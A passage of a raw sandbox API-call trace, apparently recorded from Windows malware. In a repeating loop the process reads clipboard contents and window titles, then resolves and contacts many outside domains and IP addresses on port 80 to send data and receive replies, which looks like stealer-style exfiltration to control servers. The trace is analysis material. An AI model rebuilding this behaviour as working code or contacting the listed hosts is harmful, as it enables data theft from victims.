ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb293da8 | out: ppResult=0xb293da8*=0xb0e51f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26b710*(sa_family=2, sin_port=0x50, sin_addr="217.70.184.50"), ai_next=0x0)) returned 0 [0233.198] connect (s=0x1144, name=0xb26b710*(sa_family=2, sin_port=0x50, sin_addr="217.70.184.50"), namelen=16) returned 0 [0233.232] RtlIntegerToChar (in: Value=0x37d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="893") returned 0x0 [0233.232] send (s=0x1144, buf=0x8f1cf22*, len=1301, flags=0) returned 1301 [0233.232] closesocket (s=0x1144) returned 0 [0233.232] socket (af=2, type=1, protocol=6) returned 0x1144 [0233.233] connect (s=0x1144, name=0xb26b710*(sa_family=2, sin_port=0x50, sin_addr="217.70.184.50"), namelen=16) returned 0 [0233.268] send (s=0x1144, buf=0x8f3a322*, len=165, flags=0) returned 165 [0233.269] setsockopt (s=0x1144, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0233.269] recv (in: s=0x1144, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 2928 [0233.334] closesocket (s=0x1144) returned 0 [0233.334] Sleep (dwMilliseconds=0x1388) [0233.336] OpenClipboard (hWndNewOwner=0x0) returned 1 [0233.336] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0233.336] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0233.336] GlobalUnlock (hMem=0xafaa690) returned 1 [0233.336] CloseClipboard () returned 1 [0233.336] socket (af=2, type=1, protocol=6) returned 0x1144 [0233.336] getaddrinfo (in: pNodeName="www.overway.store", pServiceName="80", pHints=0xb294118*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb294148 | out: ppResult=0xb294148*=0xb0e4930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26b750*(sa_family=2, sin_port=0x50, sin_addr="154.16.245.157"), ai_next=0x0)) returned 0 [0233.363] connect (s=0x1144, name=0xb26b750*(sa_family=2, sin_port=0x50, sin_addr="154.16.245.157"), namelen=16) returned 0 [0233.493] RtlIntegerToChar (in: Value=0x37d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="893") returned 0x0 [0233.494] send (s=0x1144, buf=0x8f1cf22*, len=1295, flags=0) returned 1295 [0233.494] closesocket (s=0x1144) returned 0 [0233.494] socket (af=2, type=1, protocol=6) returned 0x1144 [0233.495] connect (s=0x1144, name=0xb26b750*(sa_family=2, sin_port=0x50, sin_addr="154.16.245.157"), namelen=16) returned 0 [0233.624] send (s=0x1144, buf=0x8f3a322*, len=163, flags=0) returned 163 [0233.624] setsockopt (s=0x1144, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0233.624] recv (in: s=0x1144, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 2691 [0233.889] closesocket (s=0x1144) returned 0 [0233.890] Sleep (dwMilliseconds=0x1388) [0233.891] OpenClipboard (hWndNewOwner=0x0) returned 1 [0233.891] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0233.892] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0233.892] GlobalUnlock (hMem=0xafaa690) returned 1 [0233.892] CloseClipboard () returned 1 [0233.892] socket (af=2, type=1, protocol=6) returned 0x1144 [0233.892] getaddrinfo (in: pNodeName="www.7looks-mocha-totalbeauty.com", pServiceName="80", pHints=0xb2944b8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb2944e8 | out: ppResult=0xb2944e8*=0xb0e50b0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26b790*(sa_family=2, sin_port=0x50, sin_addr="183.90.231.50"), ai_next=0x0)) returned 0 [0234.441] connect (s=0x1144, name=0xb26b790*(sa_family=2, sin_port=0x50, sin_addr="183.90.231.50"), namelen=16) returned 0 [0234.685] RtlIntegerToChar (in: Value=0x37d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="893") returned 0x0 [0234.685] send (s=0x1144, buf=0x8f1cf22*, len=1340, flags=0) returned 1340 [0234.686] closesocket (s=0x1144) returned 0 [0234.687] socket (af=2, type=1, protocol=6) returned 0x1144 [0234.687] connect (s=0x1144, name=0xb26b790*(sa_family=2, sin_port=0x50, sin_addr="183.90.231.50"), namelen=16) returned 0 [0234.930] send (s=0x1144, buf=0x8f3a322*, len=178, flags=0) returned 178 [0234.930] setsockopt (s=0x1144, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0234.930] recv (in: s=0x1144, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c) returned -1 [0235.430] closesocket (s=0x1144) returned 0 [0235.431] Sleep (dwMilliseconds=0x1388) [0235.432] OpenClipboard (hWndNewOwner=0x0) returned 1 [0235.432] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0235.433] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0235.433] GlobalUnlock (hMem=0xafaa690) returned 1 [0235.433] CloseClipboard () returned 1 [0235.433] socket (af=2, type=1, protocol=6) returned 0x1144 [0235.433] getaddrinfo (in: pNodeName="www.distressedthenblessed.com", pServiceName="80", pHints=0xb294858*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb294888 | out: ppResult=0xb294888*=0xb0e2af0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26b6f0*(sa_family=2, sin_port=0x50, sin_addr="162.241.218.205"), ai_next=0x0)) returned 0 [0235.436] connect (s=0x1144, name=0xb26b6f0*(sa_family=2, sin_port=0x50, sin_addr="162.241.218.205"), namelen=16) returned 0 [0235.579] RtlIntegerToChar (in: Value=0x37d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="893") returned 0x0 [0235.579] send (s=0x1144, buf=0x8f1cf22*, len=1331, flags=0) returned 1331 [0235.579] closesocket (s=0x1144) returned 0 [0235.580] socket (af=2, type=1, protocol=6) returned 0x1144 [0235.580] connect (s=0x1144, name=0xb26b6f0*(sa_family=2, sin_port=0x50, sin_addr="162.241.218.205"), namelen=16) returned 0 [0235.722] send (s=0x1144, buf=0x8f3a322*, len=175, flags=0) returned 175 [0235.722] setsockopt (s=0x1144, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0235.722] recv (in: s=0x1144, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 869 [0235.895] closesocket (s=0x1144) returned 0 [0235.896] Sleep (dwMilliseconds=0x1388) [0235.897] OpenClipboard (hWndNewOwner=0x0) returned 1 [0235.897] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0235.898] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0235.898] GlobalUnlock (hMem=0xafaa690) returned 1 [0235.898] CloseClipboard () returned 1 [0235.898] socket (af=2, type=1, protocol=6) returned 0x1144 [0235.898] getaddrinfo (in: pNodeName="www.publiccoins.online", pServiceName="80", pHints=0xb294bf8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb294c28 | out: ppResult=0xb294c28*=0x0) returned 11001 [0235.917] getaddrinfo (in: pNodeName="www.publiccoins.online", pServiceName="80", pHints=0xb294bf8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb294c28 | out: ppResult=0xb294c28*=0x0) returned 11001 [0235.918] Sleep (dwMilliseconds=0x1388) [0235.919] OpenClipboard (hWndNewOwner=0x0) returned 1 [0235.919] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0235.920] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0235.920] GlobalUnlock (hMem=0xafaa690) returned 1 [0235.920] CloseClipboard () returned 1 [0235.920] Sleep (dwMilliseconds=0x1388) [0235.921] OpenClipboard (hWndNewOwner=0x0) returned 1 [0235.921] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0235.921] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0235.921] GlobalUnlock (hMem=0xafaa690) returned 1 [0235.922] CloseClipboard () returned 1 [0235.922] socket (af=2, type=1, protocol=6) returned 0x1964 [0235.922] connect (s=0x1964, name=0xb26bd30*(sa_family=2, sin_port=0x50, sin_addr="62.149.128.45"), namelen=16) returned 0 [0235.981] RtlIntegerToChar (in: Value=0x37d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="893") returned 0x0 [0235.981] send (s=0x1964, buf=0x8f1cf22*, len=1307, flags=0) returned 1307 [0235.981] closesocket (s=0x1964) returned 0 [0235.982] socket (af=2, type=1, protocol=6) returned 0x1964 [0235.982] connect (s=0x1964, name=0xb26bd30*(sa_family=2, sin_port=0x50, sin_addr="62.149.128.45"), namelen=16) returned 0 [0236.047] send (s=0x1964, buf=0x8f3a322*, len=176, flags=0) returned 176 [0236.047] setsockopt (s=0x1964, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0236.047] recv (in: s=0x1964, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 5276 [0236.127] closesocket (s=0x1964) returned 0 [0236.127] Sleep (dwMilliseconds=0x1388) [0236.129] OpenClipboard (hWndNewOwner=0x0) returned 1 [0236.129] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0236.129] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0236.129] GlobalUnlock (hMem=0xafaa690) returned 1 [0236.129] CloseClipboard () returned 1 [0236.129] socket (af=2, type=1, protocol=6) returned 0x1964 [0236.129] connect (s=0x1964, name=0xb26b830*(sa_family=2, sin_port=0x50, sin_addr="162.241.61.34"), namelen=16) returned 0 [0236.267] RtlIntegerToChar (in: Value=0x37d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="893") returned 0x0 [0236.268] send (s=0x1964, buf=0x8f1cf22*, len=1298, flags=0) returned 1298 [0236.268] closesocket (s=0x1964) returned 0 [0236.269] socket (af=2, type=1, protocol=6) returned 0x1964 [0236.269] connect (s=0x1964, name=0xb26b830*(sa_family=2, sin_port=0x50, sin_addr="162.241.61.34"), namelen=16) returned 0 [0236.407] send (s=0x1964, buf=0x8f3a322*, len=173, flags=0) returned 173 [0236.407] setsockopt (s=0x1964, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0236.407] recv (in: s=0x1964, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c) returned -1 [0236.908] closesocket (s=0x1964) returned 0 [0236.909] Sleep (dwMilliseconds=0x1388) [0236.911] OpenClipboard (hWndNewOwner=0x0) returned 1 [0236.911] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0236.911] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0236.911] GlobalUnlock (hMem=0xafaa690) returned 1 [0236.911] CloseClipboard () returned 1 [0236.911] socket (af=2, type=1, protocol=6) returned 0x1964 [0236.911] connect (s=0x1964, name=0xb26b670*(sa_family=2, sin_port=0x50, sin_addr="62.233.121.61"), namelen=16) returned 0 [0236.951] RtlIntegerToChar (in: Value=0x37d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="893") returned 0x0 [0236.951] send (s=0x1964, buf=0x8f1cf22*, len=1340, flags=0) returned 1340 [0236.952] closesocket (s=0x1964) returned 0 [0236.952] socket (af=2, type=1, protocol=6) returned 0x1964 [0236.952] connect (s=0x1964, name=0xb26b670*(sa_family=2, sin_port=0x50, sin_addr="62.233.121.61"), namelen=16) returned 0 [0236.993] send (s=0x1964, buf=0x8f3a322*, len=187, flags=0) returned 187 [0236.994] setsockopt (s=0x1964, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0236.994] recv (in: s=0x1964, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 4225 [0237.065] closesocket (s=0x1964) returned 0 [0237.066] Sleep (dwMilliseconds=0x1388) [0237.068] OpenClipboard (hWndNewOwner=0x0) returned 1 [0237.068] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0237.068] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0237.068] GlobalUnlock (hMem=0xafaa690) returned 1 [0237.068] CloseClipboard () returned 1 [0237.068] socket (af=2, type=1, protocol=6) returned 0x1964 [0237.068] connect (s=0x1964, name=0xb26bb10*(sa_family=2, sin_port=0x50, sin_addr="51.77.52.109"), namelen=16) returned 0 [0237.106] RtlIntegerToChar (in: Value=0x37d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="893") returned 0x0 [0237.106] send (s=0x1964, buf=0x8f1cf22*, len=1310, flags=0) returned 1310 [0237.106] closesocket (s=0x1964) returned 0 [0237.106] socket (af=2, type=1, protocol=6) returned 0x1964 [0237.107] connect (s=0x1964, name=0xb26bb10*(sa_family=2, sin_port=0x50, sin_addr="51.77.52.109"), namelen=16) returned 0 [0237.149] send (s=0x1964, buf=0x8f3a322*, len=177, flags=0) returned 177 [0237.149] setsockopt (s=0x1964, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0237.149] recv (in: s=0x1964, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 926 [0237.210] closesocket (s=0x1964) returned 0 [0237.211] Sleep (dwMilliseconds=0x1388) [0237.212] OpenClipboard (hWndNewOwner=0x0) returned 1 [0237.213] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0237.213] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0237.213] GlobalUnlock (hMem=0xafaa690) returned 1 [0237.213] CloseClipboard () returned 1 [0237.213] socket (af=2, type=1, protocol=6) returned 0x1964 [0237.213] connect (s=0x1964, name=0xb26bdf0*(sa_family=2, sin_port=0x50, sin_addr="66.235.200.145"), namelen=16) returned 0 [0237.238] RtlIntegerToChar (in: Value=0x37d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="893") returned 0x0 [0237.238] send (s=0x1964, buf=0x8f1cf22*, len=1307, flags=0) returned 1307 [0237.239] closesocket (s=0x1964) returned 0 [0237.239] socket (af=2, type=1, protocol=6) returned 0x1964 [0237.240] connect (s=0x1964, name=0xb26bdf0*(sa_family=2, sin_port=0x50, sin_addr="66.235.200.145"), namelen=16) returned 0 [0237.261] send (s=0x1964, buf=0x8f3a322*, len=176, flags=0) returned 176 [0237.261] setsockopt (s=0x1964, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0237.261] recv (in: s=0x1964, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c) returned -1 [0237.762] closesocket (s=0x1964) returned 0 [0237.763] Sleep (dwMilliseconds=0x1388) [0237.765] OpenClipboard (hWndNewOwner=0x0) returned 1 [0237.765] GetClipboardData (uFormat=0xd) returned 0xafaa2d0 [0237.765] GlobalLock (hMem=0xafaa2d0) returned 0xafaa2d0 [0237.765] GlobalUnlock (hMem=0xafaa2d0) returned 1 [0237.765] CloseClipboard () returned 1 [0237.765] socket (af=2, type=1, protocol=6) returned 0x1964 [0237.766] connect (s=0x1964, name=0xb26b8d0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.216"), namelen=16) returned 0 [0237.940] RtlIntegerToChar (in: Value=0x37d, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="893") returned 0x0 [0237.940] send (s=0x1964, buf=0x8f1cf22*, len=1310, flags=0) returned 1310 [0237.941] closesocket (s=0x1964) returned 0 [0237.941] socket (af=2, type=1, protocol=6) returned 0x1964 [0237.942] connect (s=0x1964, name=0xb26b8d0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.216"), namelen=16) returned 0 [0238.121] send (s=0x1964, buf=0x8f3a322*, len=177, flags=0) returned 177 [0238.121] setsockopt (s=0x1964, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0238.121] recv (in: s=0x1964, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c) returned -1 [0238.294] closesocket (s=0x1964) returned 0 [0238.295] Sleep (dwMilliseconds=0x1388) [0238.296] OpenClipboard (hWndNewOwner=0x0) returned 1 [0238.296] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0238.296] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0238.296] GetForegroundWindow () returned 0x2013a [0238.296] GetWindowTextW (in: hWnd=0x2013a, lpString=0x8f142a2, nMaxCount=260 | out: lpString="Blank Page - Internet Explorer") returned 30 [0238.310] GlobalUnlock (hMem=0xafaa690) returned 1 [0238.310] CloseClipboard () returned 1 [0238.310] getaddrinfo (in: pNodeName="www.elsist.online", pServiceName="80", pHints=0xb2968f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb296928 | out: ppResult=0xb296928*=0x0) returned 11001 [0238.311] getaddrinfo (in: pNodeName="www.elsist.online", pServiceName="80", pHints=0xb2968f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb296928 | out: ppResult=0xb296928*=0x0) returned 11001 [0238.312] Sleep (dwMilliseconds=0x1388) [0238.313] Sleep (dwMilliseconds=0x1388) [0238.315] Sleep (dwMilliseconds=0x1388) [0238.316] Sleep (dwMilliseconds=0x1388) [0238.318] OpenClipboard (hWndNewOwner=0x0) returned 1 [0238.318] GetClipboardData (uFormat=0xd) returned 0xafaa2d0 [0238.318] GlobalLock (hMem=0xafaa2d0) returned 0xafaa2d0 [0238.318] GlobalUnlock (hMem=0xafaa2d0) returned 1 [0238.318] CloseClipboard () returned 1 [0238.318] socket (af=2, type=1, protocol=6) returned 0x1964 [0238.319] connect (s=0x1964, name=0xb26b690*(sa_family=2, sin_port=0x50, sin_addr="121.254.178.252"), namelen=16) returned 0 [0238.590] RtlIntegerToChar (in: Value=0x499, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="1177") returned 0x0 [0238.590] send (s=0x1964, buf=0x8f1cf22*, len=1603, flags=0) returned 1603 [0238.591] closesocket (s=0x1964) returned 0 [0238.591] socket (af=2, type=1, protocol=6) returned 0x1964 [0238.592] connect (s=0x1964, name=0xb26b690*(sa_family=2, sin_port=0x50, sin_addr="121.254.178.252"), namelen=16) returned 0 [0238.861] send (s=0x1964, buf=0x8f3a322*, len=181, flags=0) returned 181 [0238.861] setsockopt (s=0x1964, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0238.861] recv (in: s=0x1964, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 367 [0239.150] closesocket (s=0x1964) returned 0 [0239.150] Sleep (dwMilliseconds=0x1388) [0239.152] OpenClipboard (hWndNewOwner=0x0) returned 1 [0239.152] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0239.152] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0239.152] GlobalUnlock (hMem=0xafaa690) returned 1 [0239.152] CloseClipboard () returned 1 [0239.219] socket (af=2, type=1, protocol=6) returned 0x1964 [0239.219] getaddrinfo (in: pNodeName="www.printyourdays.com", pServiceName="80", pHints=0xb293638*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb293668 | out: ppResult=0xb293668*=0xb0e4470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb2696f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.48.190"), ai_next=0x647be0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb269a50*(sa_family=2, sin_port=0x50, sin_addr="172.67.156.13"), ai_next=0x0))) returned 0 [0239.240] connect (s=0x1964, name=0xb2696f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.48.190"), namelen=16) returned 0 [0239.268] send (s=0x1964, buf=0x8f3a322*, len=179, flags=0) returned 179 [0239.269] setsockopt (s=0x1964, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0239.269] recv (in: s=0x1964, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 781 [0239.333] closesocket (s=0x1964) returned 0 [0239.334] Sleep (dwMilliseconds=0x1388) [0239.335] OpenClipboard (hWndNewOwner=0x0) returned 1 [0239.336] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0239.336] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0239.336] GlobalUnlock (hMem=0xafaa690) returned 1 [0239.336] CloseClipboard () returned 1 [0239.336] socket (af=2, type=1, protocol=6) returned 0x1964 [0239.336] getaddrinfo (in: pNodeName="www.knowsyourdream.com", pServiceName="80", pHints=0xb2939d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb293a08 | out: ppResult=0xb293a08*=0x0) returned 11001 [0251.399] getaddrinfo (in: pNodeName="www.knowsyourdream.com", pServiceName="80", pHints=0xb2939d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb293a08 | out: ppResult=0xb293a08*=0x0) returned 11002 [0256.996] Sleep (dwMilliseconds=0x1388) [0256.998] OpenClipboard (hWndNewOwner=0x0) returned 1 [0256.998] GetClipboardData (uFormat=0xd) returned 0xafaa2d0 [0256.998] GlobalLock (hMem=0xafaa2d0) returned 0xafaa2d0 [0256.998] GetForegroundWindow () returned 0x100d2 [0256.999] GetWindowTextW (in: hWnd=0x100d2, lpString=0x8f142a2, nMaxCount=260 | out: lpString="FolderView") returned 10 [0257.000] GlobalUnlock (hMem=0xafaa2d0) returned 1 [0257.000] CloseClipboard () returned 1 [0257.000] socket (af=2, type=1, protocol=6) returned 0x1c88 [0257.001] getaddrinfo (in: pNodeName="www.venkataramanagraphics.com", pServiceName="80", pHints=0xb293d78*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb293da8 | out: ppResult=0xb293da8*=0x647720*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb269ef0*(sa_family=2, sin_port=0x50, sin_addr="72.167.127.85"), ai_next=0x0)) returned 0 [0257.057] connect (s=0x1c88, name=0xb269ef0*(sa_family=2, sin_port=0x50, sin_addr="72.167.127.85"), namelen=16) returned 0 [0257.230] RtlIntegerToChar (in: Value=0x569, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="1385") returned 0x0 [0257.230] send (s=0x1c88, buf=0x8f1cf22*, len=1820, flags=0) returned 1820 [0257.231] closesocket (s=0x1c88) returned 0 [0257.231] socket (af=2, type=1, protocol=6) returned 0x1c88 [0257.231] connect (s=0x1c88, name=0xb269ef0*(sa_family=2, sin_port=0x50, sin_addr="72.167.127.85"), namelen=16) returned 0 [0257.400] send (s=0x1c88, buf=0x8f3a322*, len=187, flags=0) returned 187 [0257.401] setsockopt (s=0x1c88, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0257.401] recv (in: s=0x1c88, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 1892 [0257.638] closesocket (s=0x1c88) returned 0 [0257.639] Sleep (dwMilliseconds=0x1388) [0257.640] OpenClipboard (hWndNewOwner=0x0) returned 1 [0257.640] GetClipboardData (uFormat=0xd) returned 0xafaa320 [0257.640] GlobalLock (hMem=0xafaa320) returned 0xafaa320 [0257.640] GlobalUnlock (hMem=0xafaa320) returned 1 [0257.640] CloseClipboard () returned 1 [0257.640] socket (af=2, type=1, protocol=6) returned 0x1c88 [0257.641] getaddrinfo (in: pNodeName="www.monenee.xyz", pServiceName="80", pHints=0xb294118*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb294148 | out: ppResult=0xb294148*=0x0) returned 11001 [0257.664] getaddrinfo (in: pNodeName="www.monenee.xyz", pServiceName="80", pHints=0xb294118*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb294148 | out: ppResult=0xb294148*=0x0) returned 11001 [0257.665] Sleep (dwMilliseconds=0x1388) [0257.667] OpenClipboard (hWndNewOwner=0x0) returned 1 [0257.667] GetClipboardData (uFormat=0xd) returned 0xafaa2d0 [0257.667] GlobalLock (hMem=0xafaa2d0) returned 0xafaa2d0 [0257.667] GlobalUnlock (hMem=0xafaa2d0) returned 1 [0257.667] CloseClipboard () returned 1 [0257.667] socket (af=2, type=1, protocol=6) returned 0x22a4 [0257.667] getaddrinfo (in: pNodeName="www.beandhira.com", pServiceName="80", pHints=0xb2944b8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb2944e8 | out: ppResult=0xb2944e8*=0x0) returned 11001 [0257.732] getaddrinfo (in: pNodeName="www.beandhira.com", pServiceName="80", pHints=0xb2944b8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb2944e8 | out: ppResult=0xb2944e8*=0x0) returned 11001 [0257.732] Sleep (dwMilliseconds=0x1388) [0257.734] OpenClipboard (hWndNewOwner=0x0) returned 1 [0257.734] GetClipboardData (uFormat=0xd) returned 0xafaa690 [0257.734] GlobalLock (hMem=0xafaa690) returned 0xafaa690 [0257.734] GlobalUnlock (hMem=0xafaa690) returned 1 [0257.734] CloseClipboard () returned 1 [0257.735] socket (af=2, type=1, protocol=6) returned 0x22e8 [0257.735] getaddrinfo (in: pNodeName="www.mindbodyweightlossmethod.com", pServiceName="80", pHints=0xb294858*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb294888 | out: ppResult=0xb294888*=0xb0e5830*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26a8b0*(sa_family=2, sin_port=0x50, sin_addr="62.233.121.61"), ai_next=0x0)) returned 0 [0257.736] connect (s=0x22e8, name=0xb26a8b0*(sa_family=2, sin_port=0x50, sin_addr="62.233.121.61"), namelen=16) returned 0 [0257.772] RtlIntegerToChar (in: Value=0x569, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="1385") returned 0x0 [0257.772] send (s=0x22e8, buf=0x8f1cf22*, len=1829, flags=0) returned 1829 [0257.773] closesocket (s=0x22e8) returned 0 [0257.773] socket (af=2, type=1, protocol=6) returned 0x22e8 [0257.774] connect (s=0x22e8, name=0xb26a8b0*(sa_family=2, sin_port=0x50, sin_addr="62.233.121.61"), namelen=16) returned 0 [0257.814] send (s=0x22e8, buf=0x8f3a322*, len=190, flags=0) returned 190 [0257.815] setsockopt (s=0x22e8, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0257.815] recv (in: s=0x22e8, buf=0x11002d6c, len=2048000, flags=0 | out: buf=0x11002d6c*) returned 4225 [0257.874] closesocket (s=0x22e8) returned 0 [0257.875] Sleep (dwMilliseconds=0x1388) [0257.876] OpenClipboard (hWndNewOwner=0x0) returned 1 [0257.876] GetClipboardData (uFormat=0xd) returned 0xafaa2d0 [0257.877] GlobalLock (hMem=0xafaa2d0) returned 0xafaa2d0 [0257.877] GlobalUnlock (hMem=0xafaa2d0) returned 1 [0257.877] CloseClipboard () returned 1 [0257.877] socket (af=2, type=1, protocol=6) returned 0x22e8 [0257.878] getaddrinfo (in: pNodeName="www.mylyk.net", pServiceName="80", pHints=0xb294bf8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xb294c28 | out: ppResult=0xb294c28*=0xb0e4c70*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb269cb0*(sa_family=2, sin_port=0x50, sin_addr="104.21.94.157"), ai_next=0xb0e2370*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xb26aa30*(sa_family=2, sin_port=0x50, sin_addr="172.67.137.204"), ai_next=0x0))) returned 0 [0257.880] connect (s=0x22e8, name=0xb269cb0*(sa_family=2, sin_port=0x50, sin_addr="104.21.94.157"), namelen=16) returned 0 [0257.905] RtlIntegerToChar (in: Value=0x569, Base=0x0, Length=0x8, String=0x1285fe08 | out: String="1385") returned 0x0 [0257.905] send (s=0x22e8, 